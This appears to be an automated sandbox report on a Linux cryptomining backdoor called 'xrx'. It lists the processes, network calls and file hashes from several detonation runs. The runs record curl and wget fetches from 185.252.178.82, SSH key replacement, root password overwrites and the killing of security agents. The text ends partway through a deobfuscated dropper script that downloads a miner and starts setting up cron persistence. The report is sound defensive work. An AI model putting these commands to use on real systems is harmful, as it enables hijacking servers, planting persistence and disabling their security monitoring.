/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 40 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 40 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.x1Rc6IS7G0 /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.x1Rc6IS7G0]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/xrx/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
US 8.8.8.8:53 archive.ubuntu.com udp
GB 185.125.190.83:80 archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 c62354d24707a76f34fb390a592f143a
SHA1 c7bdfb9ec880e49f94433afb003a068dd6952e5d
SHA256 a084533b25ad68a5a50d966a4078ff802e8c6176d6e73cd2f34b5ac28806a256
SHA512 0c0640d64a79f5ce77dd9001e51a65b339c76bc32c84112903ddcbff0e90e016f6e8ba393cb415a4072ee7d72a24480550ee53aead9aaae77ae08d4d4698d6bd

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 8ba435a1928bd56bdafc1d1e44d8cebe
SHA1 ab792cebe40ec46566b1c0285622209adcc3bf2f
SHA256 74893bf4f22bb62714e33d5ed836c03b6fa6f33bdbbc7fc462247682258ab13d
SHA512 5d87fa68747e1166de157d2eae45841165590650cc7e4bea5ffdfd03bc68cb7070d6a973e2bc63690df74b53576788f6f7901fa83823cf1af51eeca350f44f4d

/var/cache/man/2538

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 e19832e2fc417bbc53c7583f3fc995d2
SHA1 fd08444e6f4ae73b7f86fe0f0346b71f84ceec8c
SHA256 47c70ad1112f7794a6d0cc4215b6ae2b0c5e9a58f535c8677963d1f2f4509e3f
SHA512 78248ba44a1c5bac41ede29334e94eb5891e8fdc12190e1c2c40837d0613a6988384ca592ca7650a8cf0e9713dc76b5740300610d4f525bec1b1c8fa6c9fd13f

/var/lib/update-notifier/tmp.x1Rc6IS7G0

MD5 021da29c3bae39e0096af8d9ed4758d1
SHA1 583f8cde39dab486d2a12ff2024c2f548c681df5
SHA256 c38935487c65f47ec2737c950b35930bdf2ea9685c85dd141120e04fad13e806
SHA512 e89e27af01b65bb15fd7e76f7260185594ba6300abcfde79d6ab3570624e97b3541547bdb683ff26c838b3d417c09c24d5ef05a3fe4bb01e2da134b99fd8ecf1

/etc/passwd+

MD5 61cfa0c5a9adcb8699107f1938a5d8c4
SHA1 4748b39c890427e3b23e427f2e5e59dd3cfbb19e
SHA256 7093c9fe9eabfa7f44c0fc311a58cc02c108c7b636cbf519ad59a02449ed07ec
SHA512 55e3421f6006ac122c43ed3df17263cab3756fe9ce51452460ac55a7edc4b7872aa9be2446589b5e03ca3bb7320552fc538e0374c408b764d0d8409a0ea21370

/etc/shadow+

MD5 39ae31c4efabd3fa55e71879ddb3f523
SHA1 e5cda9d16e278b2cf225b18f7012a9ee7c988c79
SHA256 919e35ee42381a437d59bd90e8740252eb9647a578f335de0ebed47275fe56e6
SHA512 3511d4b09373ea5ee1e216b79cf6aa0b403e55971abd6475fd9dc9933de1aa1c1e7b273fe7d93750be6d911a8985ca30d5e6aac0636618d347e40136fa099e26

/etc/shadow+

MD5 4c9d0341763620e395a661863de9edb0
SHA1 bd17de867fdd15deed4e99b31f11a1e434484495
SHA256 be6c23bb9d5108ff62a22f9f14e6f3f836801871e3390bad98ff134ee6218ead
SHA512 c06e64a99a3a1c7cd6c9c30646f060a0128057a5598a09094859604e689bfbf94a59bf55ebfe5d65b3cfec2adbae617d8b9972773718db5a0ae00075cf5caedd

Analysis: behavioral21

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\key

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-mipsel-20240729-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

debian9-armhf-20240418-en

Max time kernel

1s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/142/cmdline /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/636/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/152/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/290/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/267/stat /usr/bin/killall N/A
File opened for reading /proc/590/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/636/cmdline /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/661/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/318/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/671/stat /usr/bin/killall N/A
File opened for reading /proc/641/cmdline /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/658/stat /usr/bin/killall N/A
File opened for reading /proc/113/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/103/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/152/stat /usr/bin/killall N/A
File opened for reading /proc/635/cmdline /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/663/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/665/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/597/stat /usr/bin/killall N/A
File opened for reading /proc/641/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/317/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/142/stat /usr/bin/killall N/A
File opened for reading /proc/42/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

132s

Max time network

145s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/possible /usr/bin/pgrep N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/node /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/54/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/193/status /usr/bin/pgrep N/A
File opened for reading /proc/736/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/897/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2154/status /usr/bin/pgrep N/A
File opened for reading /proc/16/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/21/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/191/stat /usr/bin/pgrep N/A
File opened for reading /proc/275/status /usr/bin/pgrep N/A
File opened for reading /proc/1123/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1958/ctty /usr/bin/pgrep N/A
File opened for reading /proc/17/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/35/status /usr/bin/pgrep N/A
File opened for reading /proc/2191/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/36/ctty /usr/bin/pgrep N/A
File opened for reading /proc/41/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/65/ctty /usr/bin/pgrep N/A
File opened for reading /proc/43/stat /usr/bin/pgrep N/A
File opened for reading /proc/6/status /usr/bin/pgrep N/A
File opened for reading /proc/11/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/27/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/40/status /usr/bin/pgrep N/A
File opened for reading /proc/2048/status /usr/bin/pgrep N/A
File opened for reading /proc/1902/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1915/ctty /usr/bin/pgrep N/A
File opened for reading /proc/2093/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1644/status /usr/bin/pgrep N/A
File opened for reading /proc/1662/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1857/status /usr/bin/pgrep N/A
File opened for reading /proc/1870/status /usr/bin/pgrep N/A
File opened for reading /proc/15/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/44/status /usr/bin/pgrep N/A
File opened for reading /proc/761/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1046/status /usr/bin/pgrep N/A
File opened for reading /proc/2441/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2048/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2290/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2442/ctty /usr/bin/pgrep N/A
File opened for reading /proc/15/status /usr/bin/pgrep N/A
File opened for reading /proc/34/ctty /usr/bin/pgrep N/A
File opened for reading /proc/193/stat /usr/bin/pgrep N/A
File opened for reading /proc/580/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1915/stat /usr/bin/pgrep N/A
File opened for reading /proc/511/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1824/stat /usr/bin/pgrep N/A
File opened for reading /proc/1824/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1900/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2439/status /usr/bin/pgrep N/A
File opened for reading /proc/458/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/776/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1957/status /usr/bin/pgrep N/A
File opened for reading /proc/2379/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/35/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/1903/status /usr/bin/pgrep N/A
File opened for reading /proc/2444/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/3/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/199/stat /usr/bin/pgrep N/A
File opened for reading /proc/10/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/22/ctty /usr/bin/pgrep N/A
File opened for reading /proc/1764/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/2234/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/138/cgroup /usr/bin/pgrep N/A
File opened for reading /proc/2200/status /usr/bin/pgrep N/A
File opened for reading /proc/2378/cmdline /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 